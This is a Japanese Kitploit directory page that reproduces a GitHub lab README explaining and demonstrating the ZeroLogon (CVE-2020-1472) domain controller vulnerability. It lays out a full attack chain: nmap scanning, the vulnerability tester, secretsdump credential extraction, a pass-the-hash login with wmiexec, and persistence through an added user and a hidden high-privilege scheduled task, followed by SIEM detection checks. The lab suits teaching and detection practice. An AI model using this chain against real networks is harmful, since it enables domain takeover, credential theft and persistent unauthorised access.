Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
ZeroLogon-CVE-2020-1472-lab — ZeroLogon脆弱性(CVE-2020-1472)の説明とデモンストレーション | Kitploit
ツール/GitHubGitHub/100hnomeunome/zerologon-cve-2020-1472-lab
特権昇格パスワード攻撃永続化メカニズム脆弱性分析エクスプロイトポストエクスプロイトCTFペネトレーションテスト学習と教育

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有
ラボと実践
GitHub100hnomeunome/zerologon-cve-2020-1472-lab

ZeroLogon-CVE-2020-1472-lab

ZeroLogon脆弱性(CVE-2020-1472)の説明とデモンストレーション

リポジトリを見る
311ヶ月前未レビュー

ZeroLogon-CVE-2020-1472

ZeroLogon(CVE-2020-1472)脆弱性の説明とデモンストレーション

このラボの目的は厳密に教育目的です。本番環境または自分が所有していない環境での実行は推奨されません。

脆弱性について

脆弱性の背景

この脆弱性により、サイバー犯罪者がドメインコントローラ(DC)を乗っ取ることが可能になります。これは、コントローラ上のサービスアカウントのパスワードを変更または削除することで行われます。悪意のある攻撃者は、単にサービス拒否を引き起こすか、ネットワーク全体を乗っ取り制御することができます。2020年8月、Microsoftはパッチをリリースしました。

  • 重要度: 10.0 (緊急) (CVSS v3.1)

影響を受けるコンポーネント: Microsoft Netlogon Remote Protocol (MS-NRPC)

影響を受けるWindowsバージョン:

  • Windows Server 2008 R2
  • 2012 / 2012 R2
  • 2016
  • 2019
  • 2020年8月/9月のパッチより前のバージョン

要件

リポジトリをクローンする

  • Impacket
  • zerologon-CVE-2020-1472
  • CVE-2020-1472 - ターゲットサーバーが脆弱かどうかのテスト

ローカルで実行する場合!

  • Kali Linux のダウンロード
  • 脆弱なWindows Server 2008 R2 のダウンロード
  • Virtualbox

AWSでもこれらのイメージで可能です(課金に注意)

  • 脆弱なWindows - コミュニティ AMI 921877552404/win2016-dvwa-printnightmare-final-2022-07-04
  • Kali Linux - マーケットプレイスの AMI

おまけ: SIEMイベント分析のためのWazuhアカウント。

  • 14日間トライアルのWazuh Cloud

悪用方法

ヒント: Kali Linuxでは、SSHサービスはデフォルトで無効になっています — 手動で起動する必要があります。

サーバーが脆弱かどうかをテストする前に、nmapを使用してどのポートが開いているかを確認できます:

root@kitploit:~
nmap -sS -T4 -F --open -n ip
スクリーンショット 2025-10-10 09 34 13

CVE-2020-1472 - ターゲットサーバーが脆弱かどうかのテスト を使用します。次のコマンドを実行します:

root@kitploit:~
zerologon_tester.py <dc-name> <dc-ip>
スクリーンショット 2025-10-04 20 14 40

secretdump ツールは Impacket のツールキットです。

root@kitploit:~
python3 secretsdump.py -just-dc wayne/w2008\[email protected]
スクリーンショット 2025-10-04 20 23 53
root@kitploit:~
python3 wmiexec.py wayne/[email protected] -hashes aad3b435b51404eeaad3b435b51404ee:088386eb6982d0c2f8960c26b1ff9e6c
スクリーンショット 2025-10-04 20 27 05

すべてうまくいけば、ハッシュを使ってログインできます What is a pass-the-hash attack?

スクリーンショット 2025-10-04 20 30 39

あとは永続化を作成するだけです!新しいユーザーでも構いません!

root@kitploit:~
net user coringa Batman2025 /add
スクリーンショット 2025-10-04 20 36 09

完了!ユーザーが正常に作成されました!

スクリーンショット 2025-10-04 20 38 04

タスクを作成することも可能です!

root@kitploit:~
mkdir C:\Temp
root@kitploit:~
schtasks /Create /TN "CriarBackupPS1" /TR "powershell -NoProfile -WindowStyle Hidden -Command \"New-Item -Path 'C:\Temp\backup.ps1' -ItemType File -Force -Value '# backup script'\"" /SC ONLOGON /RL HIGHEST /F
スクリーンショット 2025-10-10 10 17 17 スクリーンショット 2025-10-10 10 20 33

SIEM イベント

ユーザーの作成と、pass-the-hash およびユーザー作成に関連するイベントを確認できます!

2025-10-06_10-08-10 2025-10-06_10-09-06

参考文献

  • Zerologon (CVE-2020-1472): An Unauthenticated Privilege Escalation to Full Domain Privilege
  • Zerologonとは?
  • [MS-NRPC]: Netlogon Remote Protocol
  • CVE-2020-1472 詳細
  • ZeroLogon-CVE-2020-1472 - YouTube ラボ
  • Pass-the-Hash Attack
  • Impacket についての詳細
ツールをダウンロード